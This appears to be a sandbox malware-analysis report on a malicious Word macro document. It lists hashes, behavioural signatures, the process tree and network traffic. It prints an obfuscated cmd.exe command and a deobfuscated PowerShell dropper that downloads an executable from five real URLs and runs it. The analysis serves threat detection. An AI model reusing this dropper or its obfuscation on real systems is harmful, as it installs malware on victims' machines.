Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    101s
  • max time network
    123s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26/05/2024, 21:49 UTC

General

  • Target

    76e3f55356e2a30593d436ab0880eff8_JaffaCakes118.doc

  • Size

    113KB

  • MD5

    76e3f55356e2a30593d436ab0880eff8

  • SHA1

    6b1725b71bf2f01ca5b6b7f4c2b4252c67a6e2b1

  • SHA256

    b76296d33b324195937257e98ff545fa525399c3f54ec9ed090e29a09ea87e5e

  • SHA512

    6d4e48af3634cea0c8f729a171c51b65cb8b9755cf173867cf201a6934a771a315cb3540c0bcd5f47a58ca200fa0d05a052fbf1313717debb7ca5ccf192cfa8c

  • SSDEEP

    1536:0TxjwKZ09cB7y9ghN8+mQ90MTT+aU1E0NpFukKH6FH:4xjnB29gb8on+E0NpFEaFH

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
1
$bio = new-object net.webclient
2
$rnv = "http://baza-shartash.ru/hkqXqT1", "http://anapapoliv.ru/Sp4na", "http://shorecrestschools.com/nnQkN", "http://comicole.com/2HZ", "http://elartedelaaccion.es/6Hyl"
3
$uqc = "179"
4
$ust = $env:temp + "\\" + $uqc + ".exe"
5
foreach ($ner in $rnv) {
6
try {
7
$bio.downloadfile($ner, $ust)
8
start-process $ust
9
break
10
} catch {
11
}
12
}
13
URLs
exe.dropper

http://baza-shartash.ru/hkqXqT1

exe.dropper

http://anapapoliv.ru/Sp4na

exe.dropper

http://shorecrestschools.com/nnQkN

exe.dropper

http://comicole.com/2HZ

exe.dropper

http://elartedelaaccion.es/6Hyl

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Start PowerShell.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\76e3f55356e2a30593d436ab0880eff8_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3160
    • C:\Windows\SYSTEM32\Cmd.exe
      Cmd /V:O/C"set - =IdBSZaVlEVEJwpRGpMcXUSahlErhlBwsz 7+Wi;mN9qC.@,\Pk}tQb'j26=oT)fDy:/nue{F4Hv1$(-x&&for %o in (16,59,30,69,26,31,27,69,28,28,33,76,53,37,59,58,67,69,30,78,59,53,55,69,18,51,33,40,69,51,44,36,69,53,43,28,37,69,67,51,38,76,26,67,9,58,54,27,51,51,16,65,66,66,53,22,32,22,78,31,27,22,26,51,22,31,27,44,26,68,66,27,49,42,19,42,60,75,45,27,51,51,16,65,66,66,22,67,22,16,22,16,59,28,37,74,44,26,68,66,21,16,72,67,22,45,27,51,51,16,65,66,66,31,27,59,26,69,18,26,69,31,51,31,18,27,59,59,28,31,44,18,59,39,66,67,67,52,49,40,45,27,51,51,16,65,66,66,18,59,39,37,18,59,28,69,44,18,59,39,66,56,73,4,45,27,51,51,16,65,66,66,69,28,22,26,51,69,1,69,28,22,22,18,18,37,59,67,44,69,31,66,57,73,64,28,54,44,21,16,28,37,51,77,54,45,54,61,38,76,68,42,43,33,58,33,54,75,34,41,54,38,76,68,31,51,58,76,69,67,74,65,51,69,39,16,35,54,47,54,35,76,68,42,43,35,54,44,69,79,69,54,38,62,59,26,69,22,18,27,77,76,67,25,14,33,37,67,33,76,26,67,9,61,70,51,26,64,70,76,53,37,59,44,63,59,30,67,28,59,22,1,71,37,28,69,77,76,67,25,14,46,33,76,68,31,51,61,38,21,51,22,26,51,78,48,26,59,18,69,31,31,33,76,68,31,51,38,53,26,69,22,49,38,50,18,22,51,18,27,70,50,50,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,88)do set ] =!] !!- :~%o,1!&&if %o==88 call %] :~-360%"
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:2196
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell $bio=new-object Net.WebClient;$rnV='http://baza-shartash.ru/hkqXqT1@http://anapapoliv.ru/Sp4na@http://shorecrestschools.com/nnQkN@http://comicole.com/2HZ@http://elartedelaaccion.es/6Hyl'.Split('@');$uqC = '179';$ust=$env:temp+'\'+$uqC+'.exe';foreach($nER in $rnV){try{$bio.DownloadFile($nER, $ust);Start-Process $ust;break;}catch{}}
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3436

Network

  • flag-us
    DNS
    roaming.officeapps.live.com
    WINWORD.EXE
    Remote address:
    8.8.8.8:53
    Request
    roaming.officeapps.live.com
    IN A
    Response
    roaming.officeapps.live.com
    IN CNAME
    prod.roaming1.live.com.akadns.net
    prod.roaming1.live.com.akadns.net
    IN CNAME
    eur.roaming1.live.com.akadns.net
    eur.roaming1.live.com.akadns.net
    IN CNAME
    weu-azsc-000.roaming.officeapps.live.com
    weu-azsc-000.roaming.officeapps.live.com
    IN CNAME
    osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com
    osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com
    IN A
    52.109.89.19
  • flag-nl
    POST
    https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
    WINWORD.EXE
    Remote address:
    52.109.89.19:443
    Request
    POST /rs/RoamingSoapService.svc HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: text/xml; charset=utf-8
    User-Agent: MS-WebServices/1.0
    SOAPAction: "http://tempuri.org/IRoamingSettingsService/GetConfig"
    Content-Length: 511
    Host: roaming.officeapps.live.com
    Response
    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/xml; charset=utf-8
    Server: Microsoft-IIS/10.0
    X-OfficeFE: RoamingFE_IN_138
    X-OfficeVersion: 16.0.17711.30575
    X-OfficeCluster: weu-000.roaming.officeapps.live.com
    X-CorrelationId: b5c64400-f0fe-47a2-9cd1-93e257e8ed6b
    X-Powered-By: ASP.NET
    Date: Sun, 26 May 2024 21:49:07 GMT
    Content-Length: 654
  • flag-us
    DNS
    46.28.109.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    46.28.109.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    19.89.109.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    19.89.109.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    18.24.18.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    18.24.18.2.in-addr.arpa
    IN PTR
    Response
    18.24.18.2.in-addr.arpa
    IN PTR
    a2-18-24-18deploystaticakamaitechnologiescom
  • flag-us
    DNS
    138.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    138.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    baza-shartash.ru
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    baza-shartash.ru
    IN A
    Response
  • flag-us
    DNS
    anapapoliv.ru
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    anapapoliv.ru
    IN A
    Response
    anapapoliv.ru
    IN A
    45.130.41.103
  • flag-ru
    GET
    http://anapapoliv.ru/Sp4na
    powershell.exe
    Remote address:
    45.130.41.103:80
    Request
    GET /Sp4na HTTP/1.1
    Host: anapapoliv.ru
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Server: nginx-reuseport/1.21.1
    Date: Sun, 26 May 2024 21:49:12 GMT
    Content-Type: text/html
    Content-Length: 37771
    Last-Modified: Fri, 30 Jun 2023 15:10:16 GMT
    Connection: keep-alive
    Keep-Alive: timeout=30
    ETag: "649ef058-938b"
    Accept-Ranges: bytes
  • flag-us
    DNS
    shorecrestschools.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    shorecrestschools.com
    IN A
    Response
    shorecrestschools.com
    IN A
    208.115.219.174
  • flag-us
    GET
    http://shorecrestschools.com/nnQkN
    powershell.exe
    Remote address:
    208.115.219.174:80
    Request
    GET /nnQkN HTTP/1.1
    Host: shorecrestschools.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    Date: Sun, 26 May 2024 21:49:12 GMT
    Server: Apache
    Location: https://shorecrestschools.com/nnQkN
    Content-Length: 219
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=iso-8859-1
  • flag-us
    GET
    https://shorecrestschools.com/nnQkN
    powershell.exe
    Remote address:
    208.115.219.174:443
    Request
    GET /nnQkN HTTP/1.1
    Host: shorecrestschools.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Date: Sun, 26 May 2024 21:49:13 GMT
    Server: Apache
    Content-Length: 315
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=iso-8859-1
  • flag-us
    DNS
    103.41.130.45.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    103.41.130.45.in-addr.arpa
    IN PTR
    Response
    103.41.130.45.in-addr.arpa
    IN PTR
    sslamper3begetcom
  • flag-us
    DNS
    comicole.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    comicole.com
    IN A
    Response
    comicole.com
    IN A
    37.153.95.99
  • flag-es
    GET
    http://comicole.com/2HZ
    powershell.exe
    Remote address:
    37.153.95.99:80
    Request
    GET /2HZ HTTP/1.1
    Host: comicole.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Date: Sun, 26 May 2024 21:49:13 GMT
    Server: Apache
    Content-Length: 315
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=iso-8859-1
  • flag-us
    DNS
    elartedelaaccion.es
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    elartedelaaccion.es
    IN A
    Response
    elartedelaaccion.es
    IN A
    134.0.9.152
  • flag-es
    GET
    http://elartedelaaccion.es/6Hyl
    powershell.exe
    Remote address:
    134.0.9.152:80
    Request
    GET /6Hyl HTTP/1.1
    Host: elartedelaaccion.es
    Connection: Keep-Alive
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Sun, 26 May 2024 21:49:13 GMT
    Server: Apache
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    X-Redirect-By: WordPress
    Upgrade: h2,h2c
    Connection: Upgrade, Keep-Alive
    Location: https://elartedelaaccion.es/6Hyl
    Content-Length: 0
    Keep-Alive: timeout=4, max=192
    Content-Type: text/html; charset=UTF-8
  • flag-us
    DNS
    174.219.115.208.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    174.219.115.208.in-addr.arpa
    IN PTR
    Response
    174.219.115.208.in-addr.arpa
    IN PTR
    174-219-115-208staticreverselstnnet
  • flag-us
    DNS
    99.95.153.37.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    99.95.153.37.in-addr.arpa
    IN PTR
    Response
    99.95.153.37.in-addr.arpa
    IN PTR
    virt3413unelinknet
  • flag-us
    DNS
    152.9.0.134.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    152.9.0.134.in-addr.arpa
    IN PTR
    Response
    152.9.0.134.in-addr.arpa
    IN PTR
    vxadb-28srvcat
  • flag-es
    GET
    https://elartedelaaccion.es/6Hyl
    powershell.exe
    Remote address:
    134.0.9.152:443
    Request
    GET /6Hyl HTTP/1.1
    Host: elartedelaaccion.es
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Date: Sun, 26 May 2024 21:49:15 GMT
    Server: Apache
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    Link: <https://elartedelaaccion.es/wp-json/>; rel="https://api.w.org/"
    Upgrade: h2
    Connection: Upgrade, Keep-Alive
    Keep-Alive: timeout=4, max=192
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8
  • flag-us
    DNS
    3.173.189.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    3.173.189.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    metadata.templates.cdn.office.net
    WINWORD.EXE
    Remote address:
    8.8.8.8:53
    Request
    metadata.templates.cdn.office.net
    IN A
    Response
    metadata.templates.cdn.office.net
    IN CNAME
    templatesmetadata.office.net
    templatesmetadata.office.net
    IN CNAME
    templatesmetadata.office.net.edgekey.net
    templatesmetadata.office.net.edgekey.net
    IN CNAME
    e26769.dscb.akamaiedge.net
    e26769.dscb.akamaiedge.net
    IN A
    23.62.61.184
    e26769.dscb.akamaiedge.net
    IN A
    23.62.61.162
  • flag-nl
    GET
    https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C
    WINWORD.EXE
    Remote address:
    23.62.61.184:443
    Request
    GET /client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: metadata.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Type: text/xml
    Server: Kestrel
    Content-Encoding: gzip
    Content-Length: 1264
    Cache-Control: max-age=54345
    Date: Sun, 26 May 2024 21:49:23 GMT
    Connection: keep-alive
    Vary: Accept-Encoding
  • flag-us
    DNS
    binaries.templates.cdn.office.net
    WINWORD.EXE
    Remote address:
    8.8.8.8:53
    Request
    binaries.templates.cdn.office.net
    IN A
    Response
    binaries.templates.cdn.office.net
    IN CNAME
    binaries.templates.cdn.office.net.edgesuite.net
    binaries.templates.cdn.office.net.edgesuite.net
    IN CNAME
    a1847.dscg2.akamai.net
    a1847.dscg2.akamai.net
    IN A
    2.17.251.17
    a1847.dscg2.akamai.net
    IN A
    2.17.251.23
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328884.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp03328884.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 22008
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: q78QzulIDkHYEnfpU4+Yyw==
    Last-Modified: Fri, 22 Apr 2016 16:10:17 GMT
    ETag: 0x8D36AC8987823BE
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 45ea03cb-501e-000a-5e97-a02e9d000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:23 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998159.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp03998159.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 3417042
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: dJw2FeVMjmh1UYz9hOWhsg==
    Last-Modified: Fri, 22 Apr 2016 16:11:19 GMT
    ETag: 0x8D36AC8BD7E1FE9
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: f0fd4826-d01e-00cf-6997-a00478000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:24 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp01840907.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp01840907.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 43653
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 2jOARYFw5gy+pyYC/dDZVQ==
    Last-Modified: Fri, 22 Apr 2016 16:08:15 GMT
    ETag: 0x8D36AC84F8E1FB0
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 333d986d-301e-008a-4b97-a0d19b000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:23 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851216.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp02851216.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 34816
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: YoYxJM3NoTXswOcieCy4iA==
    Last-Modified: Fri, 22 Apr 2016 16:09:38 GMT
    ETag: 0x8D36AC8813CE0D3
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: bdf32728-f01e-0133-2e97-a02b8c000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:23 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02835233.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp02835233.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 46413
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: xFXEvEvsng2mfE0eU+RtWg==
    Last-Modified: Fri, 22 Apr 2016 16:09:25 GMT
    ETag: 0x8D36AC879BBB45C
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 428c94d7-801e-0139-7097-a08f3b000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:23 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851218.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp02851218.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 31835
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: kqgZ1DSoquosZfDMLzO7Og==
    Last-Modified: Fri, 22 Apr 2016 16:09:39 GMT
    ETag: 0x8D36AC881E66CE5
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: b7d0a405-601e-0001-7497-a0d5f6000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:23 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391701.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp0403391701.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 698244
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 4pziZjpWoUROqjcy/7gpQA==
    Last-Modified: Wed, 29 Aug 2018 18:15:39 GMT
    ETag: 0x8D60DDB6CAEA91D
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: d7f1c987-e01e-001f-2f97-a0392e000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:24 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851217.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp02851217.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 33610
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: UYBOJVxXMXYDn01bVcEqsg==
    Last-Modified: Fri, 22 Apr 2016 16:09:38 GMT
    ETag: 0x8D36AC881987151
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 5c89f3d8-e01e-00a6-4d97-a03d34000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:23 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851219.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp02851219.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 31605
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: ae2zv4HJn+ipS7oDQIxa4Q==
    Last-Modified: Fri, 22 Apr 2016 16:09:39 GMT
    ETag: 0x8D36AC8822FFB6E
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: cb58b91a-201e-00f4-4797-a041dc000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:23 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851220.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp02851220.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 31482
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 8Q35ApgPHVvuqWssZoQIpw==
    Last-Modified: Fri, 22 Apr 2016 16:09:40 GMT
    ETag: 0x8D36AC8827914A7
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: f32060e3-b01e-0002-5297-a03492000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:23 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851221.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp02851221.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
